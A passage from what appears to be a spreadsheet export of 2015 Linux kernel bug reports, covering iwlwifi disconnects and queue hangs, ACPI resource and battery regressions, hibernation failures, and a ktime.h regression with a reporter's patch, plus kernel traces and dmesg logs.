[&lt;ffffffff8139901f&gt;] ? number.isra.2+0x33f/0x370 [ 341.044114] [&lt;ffffffff8139992f&gt;] ? string.isra.7+0x3f/0xf0 [ 341.044831] [&lt;ffffffff81162d90&gt;] ? trace_buffer_unlock_commit+0x50/0x60 [ 341.045545] [&lt;ffffffff81063f11&gt;] do_page_fault+0x31/0x70 [ 341.046252] [&lt;ffffffff8176c628&gt;] page_fault+0x28/0x30 [ 341.046964] [&lt;ffffffffa08ae073&gt;] ? rs_fill_lq_cmd+0x83/0x3e0 [iwlmvm] [ 341.047680] [&lt;ffffffffa08aec65&gt;] iwl_mvm_rs_rate_init+0x5b5/0x7e0 [iwlmvm] [ 341.048395] [&lt;ffffffffa08af5b8&gt;] iwl_mvm_rs_tx_status+0x728/0x21e0 [iwlmvm] [ 341.049098] [&lt;ffffffffa07ab3ec&gt;] ? ftrace_raw_event_iwlwifi_dbg+0xec/0x1b0 [iwlwifi] [ 341.049794] [&lt;ffffffffa08b10c2&gt;] rs_mac80211_tx_status+0x52/0x80 [iwlmvm] [ 341.050493] [&lt;ffffffffa092ca44&gt;] ieee80211_tx_status+0x244/0xd90 [mac80211] [ 341.051183] [&lt;ffffffff81769f2a&gt;] ? _raw_spin_unlock_bh+0x1a/0x20 [ 341.051864] [&lt;ffffffffa07a23e1&gt;] ? iwl_trans_pcie_reclaim+0x211/0x3b0 [iwlwifi] [ 341.052526] [&lt;ffffffffa08a3795&gt;] iwl_mvm_rx_tx_cmd+0x405/0x7c0 [iwlmvm] [ 341.053160] [&lt;ffffffff81172b42&gt;] ? ftrace_event_buffer_commit+0xa2/0x1b0 [ 341.053770] [&lt;ffffffffa089d765&gt;] iwl_mvm_rx_dispatch+0x165/0x1b0 [iwlmvm] [ 341.054356] [&lt;ffffffffa079ec38&gt;] iwl_pcie_irq_handler+0xac8/0x1520 [iwlwifi] [ 341.054916] [&lt;ffffffff810d572b&gt;] ? pick_next_task_fair+0x1bb/0x8b0 [ 341.055450] [&lt;ffffffff810f1930&gt;] ? irq_finalize_oneshot.part.30+0xf0/0xf0 [ 341.055972] [&lt;ffffffff810f1950&gt;] irq_thread_fn+0x20/0x50 [ 341.056482] [&lt;ffffffff810f1c6f&gt;] irq_thread+0x13f/0x170 [ 341.056978] [&lt;ffffffff810f19f0&gt;] ? irq_forced_thread_fn+0x70/0x70 [ 341.057481] [&lt;ffffffff810f1b30&gt;] ? irq_thread_check_affinity+0x90/0x90 [ 341.057983] [&lt;ffffffff810b8e08&gt;] kthread+0xd8/0xf0 [ 341.058475] [&lt;ffffffff810b8d30&gt;] ? kthread_create_on_node+0x1b0/0x1b0 [ 341.058970] [&lt;ffffffff8176a5bc&gt;] ret_from_fork+0x7c/0xb0 [ 341.059459] [&lt;ffffffff810b8d30&gt;] ? kthread_create_on_node+0x1b0/0x1b0 [ 341.059956] ---[ end trace db9b5455a6d7770f ]--- Output from dmesg attached. Output from trace-cmd send directly to: ilw &lt;at&gt; linux.intel.com Regards Richard</t>
  </si>
  <si>
    <t>Regressions caused by malformed ACPI resource descriptors</t>
  </si>
  <si>
    <t>v4.0-rc1</t>
  </si>
  <si>
    <t>2015-03-04 08:39 UTC</t>
  </si>
  <si>
    <t>Jiang Liu</t>
  </si>
  <si>
    <t>2015-09-16 03:14 UTC</t>
  </si>
  <si>
    <t>Created attachment 168851 [details] ACPI DSDT table with malformed ACPI resource descriptor Commit 593669c2ac0f (x86/PCI/ACPI: Use common ACPI resource interfaces to simplify implementation) causes regression to several platforms, which is caused by stricter checks in new ACPI resource parsing code and BIOSes report incorrect ACPI resource descriptors. This issue has appeared several times as below: 3162b6f0c5e1 ("PNPACPI: truncate _CRS windows with _LEN &gt; _MAX - _MIN + 1") d558b483d5a7 ("x86/PCI: truncate _CRS windows with _LEN &gt; _MAX - _MIN + 1") f238b414a74a ("PNPACPI: compute Address Space length rather than using _LEN") 48728e077480 ("x86/PCI: compute Address Space length rather than using _LEN") The root cause is that BIOS reports incorrect 'length' for ACPI address space descriptors as in attached DSDT table. DWordMemory (ResourceProducer, PosDecode, MinFixed, MaxFixed, Cacheable, ReadWrite, 0x00000000, // Granularity 0x00100000, // Range Minimum 0xFEBFFFFF, // Range Maximum 0x00000000, // Translation Offset 0xFFF00000, // Length ,, _Y00, AddressRangeMemory, TypeStatic)</t>
  </si>
  <si>
    <t>iwlwifi: dvm: 1030 randomly disconnecting MWG100231518</t>
  </si>
  <si>
    <t>2015-03-05 21:10 UTC</t>
  </si>
  <si>
    <t>Viktor Pal</t>
  </si>
  <si>
    <t>2015-11-18 10:03 UTC</t>
  </si>
  <si>
    <t>Created attachment 169351 [details] Contains logs that happen when the connection drops and then during reconnecting I'm using a Dell Inspiron 15R (N5110) laptop with following network card: Lshw output: description: Wireless interface product: Centrino Wireless-N 1030 [Rainbow Peak] vendor: Intel Corporation physical id: 0 bus info: pci@0000:09:00.0 logical name: wlan0 version: 34 serial: bc:77:37:46:b1:0d width: 64 bits clock: 33MHz capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless configuration: broadcast=yes driver=iwlwifi driverversion=3.13.0-37-generic firmware=18.168.6.1 ip=192.168.1.4 latency=0 link=yes multicast=yes wireless=IEEE 802.11bgn resources: irq:56 memory:f7a00000-f7a01fff Lspci output: 09:00.0 Network controller: Intel Corporation Centrino Wireless-N 1030 [Rainbow Peak] (rev 34) Subsystem: Intel Corporation Centrino Wireless-N 1030 BGN Flags: bus master, fast devsel, latency 0, IRQ 56 Memory at f7a00000 (64-bit, non-prefetchable) [size=8K] Capabilities: [c8] Power Management version 3 Capabilities: [d0] MSI: Enable+ Count=1/1 Maskable- 64bit+ Capabilities: [e0] Express Endpoint, MSI 00 Capabilities: [100] Advanced Error Reporting Capabilities: [140] Device Serial Number bc-77-37-ff-ff-46-b1-0d Kernel driver in use: iwlwifi The card randomly disconnects from the AP. After it disconnects I have to disable and enable wireless in network manager to be able to reconnect again. What I see in the logs while this is happening can be seen in the attached file. Adding the following module options to the modprobe configuration seems to mostly solve the problem: options iwlmvm power_scheme=1 options iwlwifi bt_coex_active=N swcrypto=1 11n_disable=1 Though I'm still seeing some disconnects, and the card does not reconnect after suspend and I have to do the mentioned disable/enable process described above. This driver card been working flawlessly for several years with Ubuntu 12.04 with the 3.2 kernel. I have also filed this bug here: https://bugs.launchpad.net/ubuntu/+source/linux-firmware/+bug/1420935 I'm more than happy to provide any additional information to get this fixed.</t>
  </si>
  <si>
    <t>Unwanted delayed execution of _Qxx EC methods</t>
  </si>
  <si>
    <t>2015-03-06 12:39 UTC</t>
  </si>
  <si>
    <t>2015-09-14 05:47 UTC</t>
  </si>
  <si>
    <t>Created attachment 169541 [details] dmesg when function keys are pressed My laptop (XPS13 9333) has two function keys to control the screen brightness. When pressed, two _Qxx ACPI methods are called, one to increase and one to decrease the brightness. Both the methods sleep for 200ms. This pause of 200ms is causing some problems when I keep one of the function keys pressed. In this situation, more queries than needed are scheduled for a delayed execution, making the screen brightness change even after the function key is released. If I keep the function key pressed for X seconds, it will take roughly 2X seconds for all the queries to be executed. Here attached see some log lines that show the problem.</t>
  </si>
  <si>
    <t>Macbook Air 6,1 doesn't detect/report battery</t>
  </si>
  <si>
    <t>3.18.7</t>
  </si>
  <si>
    <t>2015-03-10 15:08 UTC</t>
  </si>
  <si>
    <t>Benoit Gschwind</t>
  </si>
  <si>
    <t>2015-07-15 02:36 UTC</t>
  </si>
  <si>
    <t>95591 96681</t>
  </si>
  <si>
    <t>Created attachment 170271 [details] kernel 3.18.7 dmesg ACPI detect and report battery status properly in kernel 3.14.33 for Macbook Air 6,1 while in 3.18.7 and 4.0-rc3 the battery is not detected at all, no battery is reported. ac status is reported properly. Best regards</t>
  </si>
  <si>
    <t>Laptop will not shutdown after suspend to disk (regression)</t>
  </si>
  <si>
    <t>3.19 / 4.0-rc4</t>
  </si>
  <si>
    <t>2015-03-18 12:12 UTC</t>
  </si>
  <si>
    <t>2015-12-21 19:25 UTC</t>
  </si>
  <si>
    <t>Imre Deak</t>
  </si>
  <si>
    <t>Created attachment 171081 [details] dmesg output Hi, Since kernel 3.19 (including 3.19.1) the system (Laptop FSC S7110) will not correctly shut down when suspending to disk (echo disk &gt; /sys/power/state). The power-LED is still on and the fan keeps whirling. However, the hibernation image is created successfully. After pulling the plug and powering the system on, it will boot into the hibernated image without problems. I didn't ran into this problem with a former kernel as far as I can remember but 4.0-rc4 has the same issue. Suspend to RAM, shutdown and reboot all work as expected. cat /sys/power/disk [platform] shutdown reboot suspend Regards, Dirk</t>
  </si>
  <si>
    <t>regression in ktime.h circa 3.16.0-rc5+ breaks lirc irsend, bad commit 166afb64511</t>
  </si>
  <si>
    <t>kernel-PAE-3.19.1-201.fc21.i686</t>
  </si>
  <si>
    <t>2015-03-24 19:49 UTC</t>
  </si>
  <si>
    <t>Trevor Cordes</t>
  </si>
  <si>
    <t>Symptom: since upgrading from Fedora 19 (3.16) to Fedora 21 (3.17+) my MythTV infrared blaster (using lirc) stopped working. It would blast one IR command usually and then stop blasting for a while. I am using 32-bit PAE on this old MythTV box. I have successfully bisected and located a commit that is causing my problem. Look at commit 166afb64511. I have confirmed 100% this is causing the problem. Here's my guess at the bug: ktime_to_us returns s64, but the commit changes it so ktime_to_us just returns what ktime_divns returns, and ktime_divns returns a u64! If the u64 is big enough, wouldn't it wrap s64 around to a negative number? Or, perhaps if some caller is passing in negative ktime_t to begin with it will trigger without having to hit big numbers. With my limited knowledge of C, I am stabbing in the dark here. This little patch (at bottom of email) that puts the code back in place and gets rid of the function call fixes the problem for me. I applied this patch to the very latest FC21 kernel-PAE-3.19.1-201.fc21.i686 src.rpm and rpmbuilded and the bug is gone! I can once again MythTV. Hooray. I suspect no one else is seeing this because less people are running 32-bit now, and perhaps in most code paths the value of the u64 never gets above 2^63. I suspect something in drivers/media (possibly) is passing very high or negative values (possibly another bug) to these calls. Obviously my patch isn't the real solution, the real solution is to make the new function calls use a consistent 64-bit type, or figure out what in my code path is calling these functions and check it for value sanity. I've documented the whole process / details of this bug in RHBZ: https://bugzilla.redhat.com/show_bug.cgi?id=1200353 diff -uNr a/include/linux/ktime.h b/include/linux/ktime.h --- a/include/linux/ktime.h 2015-02-08 20:54:22.000000000 -0600 +++ b/include/linux/ktime.h 2015-03-23 01:09:43.000000000 -0500 @@ -173,12 +173,16 @@ static inline s64 ktime_to_us(const ktime_t kt) { - return ktime_divns(kt, NSEC_PER_USEC); +/* return ktime_divns(kt, NSEC_PER_USEC); */ + struct timeval tv = ktime_to_timeval(kt); + return (s64) tv.tv_sec * USEC_PER_SEC + tv.tv_usec; } static inline s64 ktime_to_ms(const ktime_t kt) { - return ktime_divns(kt, NSEC_PER_MSEC); +/* return ktime_divns(kt, NSEC_PER_MSEC); */ + struct timeval tv = ktime_to_timeval(kt); + return (s64) tv.tv_sec * MSEC_PER_SEC + tv.tv_usec / USEC_PER_MSEC; } static inline s64 ktime_us_delta(const ktime_t later, const ktime_t earlier)</t>
  </si>
  <si>
    <t>Dell XPS 13 9343 - Distorted audio after first suspend/resume</t>
  </si>
  <si>
    <t>4.0-rc5</t>
  </si>
  <si>
    <t>2015-03-26 14:04 UTC</t>
  </si>
  <si>
    <t>Seth Forshee</t>
  </si>
  <si>
    <t>2015-04-20 00:43 UTC</t>
  </si>
  <si>
    <t>Running Ubuntu 15.04 pre-release, 64 bit, with 4.0-rc5 kernel. I have additional patches from linux-next for the touchpad, and [1] to make ACPI report _REV=2 to keep the audio in I2S mode. I'm running with the A02 BIOS version for this machine. About 50% of the time the audio becomes badly distorted following the first suspend/resume cycle after a reboot. This happens pretty consistently if I repeat the following procedure a few times: 1. Reboot to single-user mode (i.e. append systemd.unit=rescue.target to the linux command line in grub). 2. Run 'rtcwake -m mem -s 15' 3. Wait for the machine to resume, then run 'aplay -D hw:broadwellrt286.0 &lt;file&gt;' [1] http://permalink.gmane.org/gmane.linux.acpi.devel/74165</t>
  </si>
  <si>
    <t>iwlwifi: 7260: TFD queue hang - MWG100233394</t>
  </si>
  <si>
    <t>4.0.0rc5</t>
  </si>
  <si>
    <t>2015-04-01 19:56 UTC</t>
  </si>
  <si>
    <t>Jan-Michael Brummer</t>
  </si>
  <si>
    <t>2015-07-12 07:09 UTC</t>
  </si>
  <si>
    <t>100161 100801</t>
  </si>
  <si>
    <t>Created attachment 172951 [details] Kernel log containing wifi information Enabling ac network support in FRITZ!Box 7490 (router) causes frequent connection drops using Intel 7260 card: 01:00.0 Network controller: Intel Corporation Wireless 7260 (rev 73) Subsystem: Intel Corporation Dual Band Wireless-AC 7260 Flags: bus master, fast devsel, latency 0, IRQ 33 Memory at f0600000 (64-bit, non-prefetchable) [size=8K] Capabilities: &lt;access denied&gt; Kernel driver in use: iwlwifi Kernel modules: iwlwifi Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Queue 16 stuck for 10000 ms. Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Current SW read_ptr 175 write_ptr 176 Mär 29 16:14:01 buzz-ultrabook kernel: iwl data: 00000000: 00 00 00 00 00 00 00 00 00 80 00 00 00 00 00 00 ................ Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: FH TRBs(0) = 0x00000000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: FH TRBs(1) = 0xc01100af Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: FH TRBs(2) = 0x00000000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: FH TRBs(3) = 0x80300076 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: FH TRBs(4) = 0x00000000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: FH TRBs(5) = 0x00000000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: FH TRBs(6) = 0x00000000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: FH TRBs(7) = 0x0070907c Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 0 is active and mapped to fifo 3 ra_tid 0x0000 [119,119] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 1 is active and mapped to fifo 2 ra_tid 0x0000 [0,0] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 2 is active and mapped to fifo 1 ra_tid 0x0000 [90,90] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 3 is active and mapped to fifo 0 ra_tid 0x0000 [0,0] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 4 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 5 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 6 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 7 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 8 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 9 is active and mapped to fifo 7 ra_tid 0x0000 [125,125] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 10 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 11 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 12 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 13 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 14 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 15 is active and mapped to fifo 5 ra_tid 0x0000 [0,0] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 16 is active and mapped to fifo 1 ra_tid 0x0000 [175,176] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 17 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 18 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Q 19 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Microcode SW error detected. Restarting 0x2000000. Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR values: Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: (2nd byte of CSR_INT_COALESCING is CSR_INT_PERIODIC_REG) Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_HW_IF_CONFIG_REG: 0X40489204 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_INT_COALESCING: 0X80000040 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_INT: 0X00000000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_INT_MASK: 0X00000000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_FH_INT_STATUS: 0X00000000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_GPIO_IN: 0X00000000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_RESET: 0X00000000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_GP_CNTRL: 0X080403c5 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_HW_REV: 0X00000144 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_EEPROM_REG: 0X00000000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_EEPROM_GP: 0X80000000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_OTP_GP_REG: 0X803a0000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_GIO_REG: 0X00080044 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_GP_UCODE_REG: 0X00000000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_GP_DRIVER_REG: 0X00000000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_UCODE_DRV_GP1: 0X00000000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_UCODE_DRV_GP2: 0X00000000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_LED_REG: 0X00000060 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_DRAM_INT_TBL_REG: 0X88213ff3 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_GIO_CHICKEN_BITS: 0X27800200 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_ANA_PLL_CFG: 0Xd55555d5 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_MONITOR_STATUS_REG: 0X3d0801bd Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_HW_REV_WA_REG: 0X0001001a Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: CSR_DBG_HPET_MEM_REG: 0Xffff0010 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: FH register values: Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: FH_RSCSR_CHNL0_STTS_WPTR_REG: 0X21314a00 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: FH_RSCSR_CHNL0_RBDCB_BASE_REG: 0X02131490 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: FH_RSCSR_CHNL0_WPTR: 0X00000040 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: FH_MEM_RCSR_CHNL0_CONFIG_REG: 0X00801114 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: FH_MEM_RSSR_SHARED_CTRL_REG: 0X000000fc Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: FH_MEM_RSSR_RX_STATUS_REG: 0X03030000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: FH_MEM_RSSR_RX_ENABLE_ERR_IRQ2DRV: 0X00000000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: FH_TSSR_TX_STATUS_REG: 0X07ff0001 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: FH_TSSR_TX_ERROR_REG: 0X00000000 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Start IWL Error Log Dump: Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Status: 0x00000000, count: 6 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: Loaded firmware version: 25.15.12.0 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x00000084 | NMI_INTERRUPT_UNKNOWN Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x00800A34 | uPc Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x00000000 | branchlink1 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x00000B34 | branchlink2 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x000164F0 | interruptlink1 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x00007AA0 | interruptlink2 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x00000000 | data1 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x00000080 | data2 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x07030000 | data3 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x79404B4F | beacon time Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x522A1455 | tsf low Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x00000000 | tsf hi Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x00000000 | time gp1 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x58C66931 | time gp2 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x00000000 | time gp3 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x0004190F | uCode version Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x00000144 | hw version Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x40489204 | board version Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x10AF001C | hcmd Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0xA4022002 | isr0 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x01800000 | isr1 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x0000000A | isr2 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x004128C9 | isr3 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x00000000 | isr4 Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x00004110 | isr_pref Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x00000000 | wait_event Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x00000080 | l2p_control Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x00012030 | l2p_duration Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x0000003F | l2p_mhvalid Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x000000CE | l2p_addr_match Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x00000005 | lmpm_pmg_sel Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x03021421 | timestamp Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: 0x00344050 | flow_handler Mär 29 16:14:01 buzz-ultrabook kernel: ieee80211 phy0: Hardware restart was requested Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: L1 Disabled - LTR Disabled Mär 29 16:14:01 buzz-ultrabook kernel: iwlwifi 0000:01:00.0: L1 Disabled - LTR Disabled</t>
  </si>
  <si>
    <t>iwlwifi: Missing descirption of Intel 7265 Wi-Fi Adapter in CONFIG_IWLDVM and CONFIG_IWLMVM</t>
  </si>
  <si>
    <t>3.19.3</t>
  </si>
  <si>
    <t>2015-04-02 08:55 UTC</t>
  </si>
  <si>
    <t>Marius Brehler</t>
  </si>
  <si>
    <t>2015-04-19 18:49 UTC</t>
  </si>
  <si>
    <t>Created attachment 172991 [details] Patch for description of CONFIG_IWLDVM and CONFIG_IWLMVM Configuring a 3.19.3 kernel, I noticed that the describtion for the Intel 7265 Wi-Fi Adapter is missing in the Kconfig file for the iwldriver. CONFIG_IWLWIFI is already fixed in iwlwifi-next [1]. Still CONFIG_IWLDVM and CONFIG_IWLMVM need an updated description, as in the attached patch. I cloned iwlwifi-next [1] and checked against commit 31755207afc5d5a30e3eea9e4f2a518fc5b680c1. [1] http://git.kernel.org/cgit/linux/kernel/git/iwlwifi/iwlwifi-next.git/</t>
  </si>
  <si>
    <t>Unreliable hibernation on Lenovo X230</t>
  </si>
  <si>
    <t>2015-04-03 15:52 UTC</t>
  </si>
  <si>
    <t>rhn</t>
  </si>
  <si>
    <t>2015-11-15 23:54 UTC</t>
  </si>
  <si>
    <t>Created attachment 173061 [details] dmesg - broken commit, fresh boot Between kernel 3.16 and 3.17, a regression has been introduced where the first hibernation after regular shutdown always fails to resume. Subsequent hibernations succeed. The system is a Lenovo x230 with Intel i5, booting with EFI, with the hibernate partition located on a secondary SSD drive. Installed system is Fedora 20, hibernation and reboots were issued using the KDE shutdown dialog. I have tracked the problem to first appear in the commit e67ee10190e69332f929bdd6594a312363321a66 Merge branches 'pm-sleep', 'pm-cpufreq' and 'pm-cpuidle' The failure mode looks similar to the one specified by commit 84c91b7ae07c62cf6dee7fde3277f4be21331f85 PM / hibernate: avoid unsafe pages in e820 reserved regions and reverting this commit seems to solve the problem.</t>
  </si>
  <si>
    <t>Intel 7265 can't connect to AP of the phone and link is unstable</t>
  </si>
  <si>
    <t>4.0.0-rc7</t>
  </si>
  <si>
    <t>2015-04-10 16:23 UTC</t>
  </si>
  <si>
    <t>2015-05-10 05:39 UTC</t>
  </si>
  <si>
    <t>Created attachment 173731 [details] dmesg after fresh reboot with new kernel with enabled traces I have just received Lenovo ThinkPad X1 3 gen with network card: 04:00.0 Network controller: Intel Corporation Wireless 7265 (rev 59) Currently I have kernel 4.0.0-rc7 and firmware iwlwifi-7265-12, I can't connect to any of access points provided by smartphones and I have periodic link drops on Ubnt Unify APs and TP-Link, maybe on others too, but I have these available only. What bothers me a lot is that I can't use my mobile phone (Blackberry q10 and Blackberry Classic) as access point for my new laptop. I've made trace, in accordance to wiki: trace-cmd record -e iwlwifi -e mac80211 -e cfg80211 -e iwlwifi_msg Link has been posted to "URL" field of the bug. Please let me know if you need anything else or how can I debug more.</t>
  </si>
  <si>
    <t>ACPI initialisation broken since 3.14-rc1 for some mainboards.</t>
  </si>
  <si>
    <t>2015-04-23 09:38 UTC</t>
  </si>
  <si>
    <t>2015-08-28 10:21 UTC</t>
  </si>
  <si>
